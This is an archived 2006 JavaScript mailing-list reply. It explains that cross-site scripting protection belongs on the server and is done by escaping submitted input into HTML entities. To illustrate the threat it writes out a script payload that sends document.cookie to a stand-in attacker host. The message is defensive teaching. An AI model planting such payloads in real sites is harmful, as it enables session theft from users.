[Javascript] Javascript Security
tedd
tedd at sperling.com
Sun Aug 6 09:41:21 CDT 2006
At 6:49 AM -0400 8/6/06, Mark Wonsil wrote:
>With the advent of AJAX, I've been noticing more articles about Javascript
>security, like this one:
>
>http://news.zdnet.com/2100-1009_22-6099891.html?tag=nl.e540
>
>which claim that security can only be attained at the server. The article does
>not go into what kind of security specifically. So I was wondering, what do
>people recommend to protect against cross-site scripting, etc.?
>
>Mark W.
Mark:
Yes, security can better be served at the server -- you simply can't
trust client-side.
You protect server-side by inspecting everything you gather and send
back to the browser.
For example, if you have a form that gathers the name of poster to be
listed in your blog, you don't want that name passed back to the
browser without at least altering any offensive html code it may
contain.
Let's take this "name" submitted by an evil person:
<script>
document.location='htttp://evil.exampe.org/steal.php?cookies=' +
document.cookie
</script>
What would that do to your blog if posted "as-is"?
So, you replace all the html characters with their html equivalents
(&lt; and such), so that the html will treat the submitted data as
text and not code -- get the idea?
You might want to purchase/read PHP Security by Shiflett -- a great
book and well worth the price.
tedd
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com